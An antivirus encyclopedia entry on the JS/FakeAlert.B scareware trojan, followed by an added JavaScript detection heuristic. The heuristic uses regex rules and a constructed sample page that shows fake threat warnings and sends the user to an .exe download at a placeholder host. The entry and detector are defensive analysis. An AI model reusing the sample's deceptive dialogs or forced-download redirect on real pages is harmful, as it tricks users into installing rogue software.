JS/FakeAlert.B!tr

Aliases: Adware.Fakealert-560, HTML/FakeAler.ibp.6, HTML/FakeAle.avs.77
Release Date: Aug 31, 2009
Detection Availability
Active Database, Extended Database
FortiGate low high
FortiClient
FortiMail N/A
Current Antivirus Definition Database Version: 11.578
Description

Visible Symptoms

  • Popup messages are displayed containing fake information on found threats in the user's computer.


Detailed Analysis


This detection is for HTML files that display messages intended to deceive the user into believing that the system is infected with different types of malware. The messages are also intended to trick the user into downloading rogue security programs such as Personal Antivirus and Total Security.


Technical Details


When the HTML file is first loaded in the user's browser, it displays a message box warning the user that the system needs to be scanned for threats. Below is an example of this message:



Figure 1: Example of the fake warning message.

The trojan behaves the same whether the user clicks the OK or the Cancel button. After the user clicks either button, the browser displays a page containing fake information on the numbers of threats found on the computer. These numbers are hard-coded and do not correspond to actual threats.

When the user closes the browser window, the page displays another message box stating that a security program is required to repair the computer. As of this writing, Personal Antivirus and Total Security are the names of the rogue security programs that are mentioned. Below is an example of this message:



Figure 2: Example of the message requiring the user to install the rogue security program.

The user is given no option other than the OK button. After the user clicks this button, the trojan downloads the rogue security program.
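
The behaviors described above can be turned into a static triage heuristic for HTML files. The following is an added example, not Fortinet's detection logic. The browser APIs it matches (alert/confirm, onunload/onbeforeunload, location), the .exe check, the weights, the threshold and both sample pages are assumptions constructed for illustration.

```javascript
// Static heuristic for the behaviours this entry describes (added example).
// The browser APIs matched here (alert/confirm, onunload, location) and the
// .exe check are ASSUMPTIONS about how such a page is written, not page facts.
const RULES = [
  { id: "dialog", weight: 1, re: /\b(?:alert|confirm)\s*\(/ },
  // confirm() used as a bare statement: OK and Cancel lead to the same result
  { id: "confirm-result-ignored", weight: 2, re: /(?:^|[;{}\n])\s*(?:window\.)?confirm\s*\(/ },
  // a handler that runs when the window is closed
  { id: "dialog-on-close", weight: 2, re: /\bon(?:before)?unload\b/i },
  // rogue product names taken from the entry text
  { id: "rogue-product-name", weight: 2, re: /Personal Antivirus|Total Security/i },
  // hard-coded threat counts in the markup
  { id: "hardcoded-threat-count", weight: 1, re: /\b\d+\s+(?:threats?|infections?)\b/i },
  // navigation to an executable (assumed download mechanism)
  { id: "exe-navigation", weight: 2, re: /location(?:\.href)?\s*=\s*["'][^"']+\.exe["']/i },
];
const THRESHOLD = 5; // constructed cut-off; tune against your own corpus

function scoreFakeAlert(html) {
  const hits = RULES.filter((r) => r.re.test(html));
  const score = hits.reduce((sum, r) => sum + r.weight, 0);
  return { score, hits: hits.map((r) => r.id), suspicious: score >= THRESHOLD };
}

// Constructed samples (not captured from a real page).
const SAMPLE_FAKEALERT = `<html><body onload="start()"><script>
function start() {
  confirm("Your computer needs to be scanned for threats.");
  showResults();
}
window.onunload = function () {
  alert("Install Personal Antivirus to repair your computer.");
  location.href = "http://download.example.invalid/setup.exe";
};
</script><p>31 threats found</p></body></html>`;

// A legitimate page that also uses confirm() and an unload handler.
const SAMPLE_BENIGN = `<html><body><script>
function del(form) { if (confirm("Delete this record?")) form.submit(); }
window.onbeforeunload = function () { return "Unsaved changes"; };
</script><form onsubmit="del(this)"></form></body></html>`;

console.log(scoreFakeAlert(SAMPLE_FAKEALERT));
console.log(scoreFakeAlert(SAMPLE_BENIGN));
```

The benign sample shows why no single rule is sufficient: confirm() and unload handlers are common on legitimate pages, so the verdict depends on the combination of traits.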


Description Last Updated Date: Sep 10, 2009
Reference: ID - 1014569